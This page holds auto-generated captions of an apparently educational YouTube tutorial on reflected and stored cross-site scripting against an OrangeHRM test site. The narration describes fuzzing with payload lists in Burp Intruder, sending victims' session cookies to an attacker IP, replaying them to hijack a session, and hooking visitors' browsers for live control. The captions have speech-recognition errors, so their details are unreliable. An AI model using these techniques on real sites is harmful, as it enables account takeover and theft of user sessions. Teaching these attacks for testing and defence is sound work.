Cross Site Scripting (XSS) tutorial for Beginners

Video Statistics and Information

Video
Captions Word Cloud
Reddit Comments
Captions
this is going to be really interesting tutorial because allow us to PL our own code into a website allowing us to control where website is Hing into and what we want to do with those existing sessions and all you need to know is a little bit of JavaScript and you're good to go and before we get started because remember hacking is illegal if you get caught hacking do not tell them you know who is Mr hacker Loy and if you want to you can go ahead and try hacking Mr lyy Young's website ly young.com and yes I promise you I will help you find your IP address I'll help you find your username your passwords your data bu and everything about you for free so go ahead and do that so this is what we call as a cross site scripting attack and there are two forms of it the first time is what we call as the reflected cross-site scripting attack and what it does here is that when you target into a website say for example loyy young.com what you have here is you have the following path and of course in this case you could enter something like JavaScript and you're able to say capture the cookie information you're able to redirect the website into another completely different site and the second type of attack is what we call as a stored cross- site scripting attack so what this does is that your JavaScript in this case is going to be stored into the computer backend usually typically on the backend database system and you have your code right here so whoever loads over into the site will load the hacker JavaScript as well so this is what we call as the St cross-site scripting attack and yes you are correct we'll be learning both of them today so this is going to be a pretty long tutorial and I already had 50 cups of coffee in order to do this tutorial for you so go ahead grab yourself a cup of coffee tea or me so right in front of us we're in call Linux this is going to be the ethical hacking operating system that'll be using as part of doing this tutorial so that's really cool so right in front of us we have a website all right so this St your new level of human resource management HR management and we have a login on the left site so let's go ahead and answerer say our login name all right so in this case I can enter hack aoy and we have the password of 1 2 3 4 5 6 78 of course this is the password to use especially when you are a popular hacker because people will think that you'll be using a very complicated password so again reverse psychology 101 so go ahead and click on login and right here we're in right we're now inside the orange human resource management system and what we're trying to do here is to uncover the entry points that will allow us to inject our own script so right over here we have a typical looking website and what we're trying to do now is we're targeting the part here which is the URL so in this case we would have different type of links pages and so on and what we're trying to Target and attack over here is to inject different type of script into this segment so that we can see whether we're able to do say for example an alert followed by say xss and we have different payloads to try it out and as we inject different type of payload over here and the moment we get a pop up say in this case for an alert it means that we are able to prove that this segment is vulnerable susceptible to cross site scripting attack and you can see over here we are in the following directory in color Linux which is USR share wood list the blue fuz injections and once we're over here we're able to go ahead and figure out what are the different type of payloads that we can use as part of again attacking different parts of the URL so in this case we have xs. txt so if I go ahead and enter say hit xss TX we can see all these are different examples of JavaScript that we can inject over into the URL we can see which one of them is going to allow us to get the popup that we want to validate that this segment or this section of the page is vulnerable and as you can see over here we have the URL in this case we have going into the directory of templates recruitment job vacancy PHP so this is the target page and the following of recruit code equal so they're expecting some kind of recruit code and in this case we're ending off a JavaScript first so we're ending off the JavaScript and inserting our own JavaScript into the recruit code so in this case this allow us to execute whatever script we want to write in here and once you're rating in three 2 1 hit answer on that boom you have this beautiful pop up and what does it mean it means that this part of the page is susceptible it is vulnerable to crossy scripting attack and you'll be saying okay so what what can we do about it now before we go into what we can do about it you can also use in tool like burp Suite to help us load all of those different malicious cross- site scripting payloads over into the target fuel so in this case let's go ahead and start burp and what we can do now is go over into the top right corner of the browser all right so go ahead and select on it and of course use foxy proxy in this case we're targeting over into burp so burps will help us intercept the requests so once you're in here all we got to do is say for example I hit Ander on this again and burp Su under the proxy tab with pick pick this up you will pick this request up and all we got to do is do a right click all right send over into in this case so let send over into Intruder all right so once you're in Intruder all you got to do right now is go ahead and clear all this different payload markers and once you're ready you can just change the recruit code in this case maybe I'll put a and what I can do now is go ahead and highlight this one at the payload marker go over on the payloads and click on the load so in this case we're Ro list and of course we can go over in directory that we were at earlier under W first under injections under xss so here we have all this different cross-site scripting attack payloads that we can use and start attacking hammering away into that specific F right and we can see the L and see what is the potential response to it so if you want to investigate a little deeper you can see right here we have the following the function go back all right so in this case you can see that the payload has been supplied over here and you can see the function has the curly braces all right as well as another curly braces over here so if we can escape away from this following it means that this will allow us to run our own JavaScript onto the site so this is genius so extracting the piece of code over here you can see the following if we could terminate from this end with a double code and Then followed by say a curly braces to end it all off and then from there on we're then able to say close off possibly the script and then inject our own script into it which is why the initial payload you saw earlier was working so what we're going to do now is we don't know the username or the password but what we could possibly do is sort of hijack their session so what I can do now is go ahead and use Python 3-m HTTP do server and we're starting up our server so anytime we can redirect all those session information from the user to the hacker so in this case what I can do now is go ahead and craft out a more specific payload that allow us to do just that so you can see over here we have the document. location and we fing this over into the hacker IP address all right so in this case let me just go ahead and double check on this this is on Port 8000 all right so let's go ahead and fix this up a little bit so let's go ahead and enter Port 8,000 for this and once we're ready in three 2 1 hit enter on that go back over into terminal and see what we got right nothing for now let's go ahead and try out the ipdr okay we have the IP address 21680 1117 let's go ahead and start it up again head back over into the payload all right so in this case we have document location we have the following of document allocation 18821 68.0 to 1117 party th000 SL cookie equal okay let's go ahead and Trish sh this one okay I've added a question mark over here so let's go ahead and hit answer on that and let's see what we get this time around mhm all right still nothing but no worries let's go a and try something else now what I've done here is I've changed this up to location. HF so let's go ahead and hit enter on that go back over terminal let's see what we get uh huh so you know what's the problem the problem is because there's numerous special characters in here and what we need to do then is to encode it so we can go back over into burp Suite go to the decoder tab copy and paste the payload over here and go to the right side and select as encode as URL so once we have this we can copy go over into the browser and replace this payad with the URL and code of payload and once you're ready in 3 2 1 hit enter now go back over terminal and see what we get boom you're in it's game over so here's the thing we may not have the username all the password but it doesn't matter what we have here now is a session cookie and all we need to do is to copy and paste those information over into our browser and that's it we would gain access to the users existing session now here I am in a completely different browser I go to the top right corner and I select under more tools and I select On developable Tools so once I'm in here all right what I can do now is go ahead and enter those different name as well as the value that's been assigned for this particular site all right so now we got all the values all the cookies right here this is the hecked values and you can see over here we have not yet went over into one part of the site which is the index.php so once we're ready all we going to do now is go over into URL and enter the following of index.php and once you're ready go ahead and hit enter on that boom we are in I can see right here welcome hacker so now we have gained access to the user session the other payload that we have here is to redirect the user into loyy young.com so this is super neat so I go over into the encoded payload I go back over into the browser and I replace this payload over here with the encoded payload I hit enter and watch this carefully hit enter on that boom we are now brought over into Mr Hackle LA's website now moving forward going over to the other type of cross scripting attack so in this case it's a store crossy scripting attack tag what it does is that our code our screen will now be stored into a part of the site possibly persisting on the backend database so whoever loads into this site will now load the code that we want to enter over into the site super cool so here we have a super interesting piece of code what it does here for us is they allow us to interact live with the user so whoever loads into this page we can send a script directly over into the browser session so what I can do now is go ahead and click over into the following all right here you have the IP address all right so this is the tackles IP address of 1 1821 68.0 to 1117 for the port of through 34 all right so once we're ready click submit now it's persisting over here under the entry now moving over to terminal what this does for us is it give us persistent interactive session with the user so if we go ahead and on that and what we can do now so say for example alert you have been hacked by Mr hacker Loy all right so with that I can go ahead and hit enter on this all right I go back over to browser you see over here you have been hacked by Mr hacker LW so we are interacting live with the user and I can even redirect them that we saw earlier to Mr hack's website so what I can do now is go ahead and enter the following right which is window.location href right in this case equal right https loyy young.com all right you hit enter on this you go back over to browser you see here that's a redirection we've been redirected to Mr hack's website and remember kids with great power comes great responsibility
Info
Channel: Loi Liang Yang
Views: 77,611
Rating: undefined out of 5
Keywords: hacker, hacking, cracker, cracking, kali linux, kali, metasploit, ethical hacking, ethical hacker, penetration testing, penetration tester, owasp
Id: bCP8_WYsvP4
Channel Id: undefined
Length: 11min 37sec (697 seconds)
Published: Sat Oct 21 2023
Related Videos
Note
Please note that this website is currently a work in progress! Lots of interesting data and statistics to come.